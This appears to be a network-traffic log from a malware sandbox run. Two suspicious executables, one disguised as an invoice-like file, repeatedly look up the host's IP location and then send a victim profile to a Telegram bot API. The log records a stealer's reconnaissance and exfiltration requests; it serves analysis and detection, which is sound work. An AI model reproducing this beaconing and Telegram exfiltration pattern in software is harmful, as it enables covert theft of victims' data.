                                                          2024-09-30 13:03:17 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                          2024-09-30 13:03:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.449757188.114.97.34437552C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-09-30 13:03:20 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                          Host: reallyfreegeoip.org
                                                          Connection: Keep-Alive
                                                          2024-09-30 13:03:20 UTC676INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:20 GMT
                                                          Content-Type: application/xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          vary: Accept-Encoding
                                                          Cache-Control: max-age=86400
                                                          CF-Cache-Status: HIT
                                                          Age: 17431
                                                          Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UyLvZ6nW1Ffg0gR%2BGgcJk7n3y87Q4vowx2PrsbV969E60vXH%2BZK6J5KOb8T454tuzvJxULSQxJVIzea39HmCFPwNVEzKSX7G3ryLAJj%2Fm4jo7z4uoixfTVAxzHQeBiF1YJFkmeQt"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8cb4699a5bbe4375-EWR
                                                          2024-09-30 13:03:20 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                          2024-09-30 13:03:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.449758188.114.97.34437180C:\Users\user\Desktop\3140, EUR.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-09-30 13:03:21 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                          Host: reallyfreegeoip.org
                                                          Connection: Keep-Alive
                                                          2024-09-30 13:03:21 UTC710INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:21 GMT
                                                          Content-Type: application/xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          vary: Accept-Encoding
                                                          Cache-Control: max-age=86400
                                                          CF-Cache-Status: HIT
                                                          Age: 17432
                                                          Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IdBv1KhwlxZgZMA7YpOCtxXMgAwqUIrzuoV%2F9%2BIEVKaYkXh9YMT6XyI8k3YrQFubWuivu%2BTsnW9YtwrrAhlQvjeU21wy%2F4jPy0WG%2Bymndjlr6c1YmJx9EKF6GrRQOzJhaujcOYA7"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8cb4699d8c6a43d7-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-09-30 13:03:21 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                          2024-09-30 13:03:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.449761188.114.97.34437552C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-09-30 13:03:24 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                          Host: reallyfreegeoip.org
                                                          Connection: Keep-Alive
                                                          2024-09-30 13:03:24 UTC678INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:24 GMT
                                                          Content-Type: application/xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          vary: Accept-Encoding
                                                          Cache-Control: max-age=86400
                                                          CF-Cache-Status: HIT
                                                          Age: 17435
                                                          Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4friEx%2F6SoawIqeVlRhaVEMttKEHM7t9s22eG9rC2JRlVgLi2ttp%2BEpGJwEQbEpkyimlqmoxM%2FUeGkE1P1koHdZWz0W0JaUMXaBgfnGfHExJlzX3hRg2ttPqenMbAlX%2BdP6lwdUC"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8cb469b3db5c43a0-EWR
                                                          2024-09-30 13:03:24 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                          2024-09-30 13:03:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.449763188.114.97.34437180C:\Users\user\Desktop\3140, EUR.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-09-30 13:03:25 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                          Host: reallyfreegeoip.org
                                                          2024-09-30 13:03:25 UTC684INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:25 GMT
                                                          Content-Type: application/xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          vary: Accept-Encoding
                                                          Cache-Control: max-age=86400
                                                          CF-Cache-Status: HIT
                                                          Age: 17436
                                                          Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tX7tK%2BTAJJjUQ54gSkILkJV20m%2BvrXiP6li94zFMisVLcN%2BIX62sa0q8HhClMc%2FLS8ID3pajLXfrTmiw19%2FFn%2B9ggfy7cZD%2FinLODM9ieCMulzgO3i9H8bgRv4q2bT4hOny7wVFC"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8cb469bb08618cb9-EWR
                                                          2024-09-30 13:03:25 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                          2024-09-30 13:03:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.449765188.114.97.34437552C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-09-30 13:03:27 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                          Host: reallyfreegeoip.org
                                                          2024-09-30 13:03:28 UTC674INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:28 GMT
                                                          Content-Type: application/xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          vary: Accept-Encoding
                                                          Cache-Control: max-age=86400
                                                          CF-Cache-Status: HIT
                                                          Age: 17439
                                                          Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H9VQL2gQxAZ6CNJ7S2Rd2KgJ3inTl1oELQu5K9bGHB9ypIC54ONhkrT98fpSpBN1TP4U93aK1htyihTSLKxZ0y9y5PTkSDTrhG8IqoSc%2BeZnNBsKm%2FejcIwy5vUrUUcMd3YVchsb"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8cb469c85f7c0f7b-EWR
                                                          2024-09-30 13:03:28 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                          2024-09-30 13:03:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.449766188.114.97.34437180C:\Users\user\Desktop\3140, EUR.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-09-30 13:03:28 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                          Host: reallyfreegeoip.org
                                                          2024-09-30 13:03:28 UTC678INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:28 GMT
                                                          Content-Type: application/xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          vary: Accept-Encoding
                                                          Cache-Control: max-age=86400
                                                          CF-Cache-Status: HIT
                                                          Age: 17439
                                                          Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LesU2KGcw88YHphVXYU8WBmR1wknuJ9pac1ggqTq0JzVNiH30%2BcGUhkbHocaoT8qOt2H%2FGkZ86XEknJjmYi6gWTPIX1l%2FImgiqLDF3gUGLQVo1liV2ND4%2FkSOHvBUjGIPYupsyib"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8cb469cccc364356-EWR
                                                          2024-09-30 13:03:28 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                          2024-09-30 13:03:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.449768149.154.167.2204437180C:\Users\user\Desktop\3140, EUR.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-09-30 13:03:29 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2001/10/2024%20/%2010:09:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                          Host: api.telegram.org
                                                          Connection: Keep-Alive
                                                          2024-09-30 13:03:29 UTC344INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.18.0
                                                          Date: Mon, 30 Sep 2024 13:03:29 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 55
                                                          Connection: close
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                          2024-09-30 13:03:29 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.449769188.114.97.34437552C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-09-30 13:03:33 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                          Host: reallyfreegeoip.org
                                                          Connection: Keep-Alive
                                                          2024-09-30 13:03:33 UTC682INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:33 GMT
                                                          Content-Type: application/xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          vary: Accept-Encoding
                                                          Cache-Control: max-age=86400
                                                          CF-Cache-Status: HIT
                                                          Age: 17444
                                                          Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ItIkAikdSICVbpc%2FIjsqVnzQBYCd2u02ifFKapSwsRzxkZaKhW9wzCr6EJP30EeXQk5%2B8eOTVEhDPv4mndC0k1DzUxU4v67mepOUWmpzzk%2BXp7549gYc%2Bu3yLpLhxGBT%2BAU06R%2B"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8cb469eb586a43ac-EWR
                                                          2024-09-30 13:03:33 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                          2024-09-30 13:03:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.449771188.114.97.34437552C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-09-30 13:03:36 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                          Host: reallyfreegeoip.org
                                                          Connection: Keep-Alive
                                                          2024-09-30 13:03:36 UTC676INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:36 GMT
                                                          Content-Type: application/xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          vary: Accept-Encoding
                                                          Cache-Control: max-age=86400
                                                          CF-Cache-Status: HIT
                                                          Age: 17447
                                                          Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=biNDPfZfn7q1MMzi6BKkN%2Bo4qBMGJvwcJBb6Tw2YowTXsOGEfCn7NntuZwXRHejc%2FPUnTF80dvJ5lrcmywOvAJ843%2BbzrLh4iDkDUe7Ms8d1YSRgagh2kwrX91c2eJxIy88jrjzO"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8cb469fbb99c78ed-EWR
                                                          2024-09-30 13:03:36 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                          2024-09-30 13:03:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.449774188.114.97.34437552C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-09-30 13:03:38 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                          Host: reallyfreegeoip.org
                                                          2024-09-30 13:03:38 UTC674INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:38 GMT
                                                          Content-Type: application/xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          vary: Accept-Encoding
                                                          Cache-Control: max-age=86400
                                                          CF-Cache-Status: HIT
                                                          Age: 17449
                                                          Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NocIXgAWsLAhOrCJJTEZFyWh%2FDxgM7za5suGgbuTTxBNykYMqEbOM05R2oCmcL5JJZlE0pe9z4VUIVgtej2R8B%2BfPesrlh2WstnNBx9jd5x4FQBfwPMqvwT7TOdq6ttLzWDzEBL9"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8cb46a0b3f7e43aa-EWR
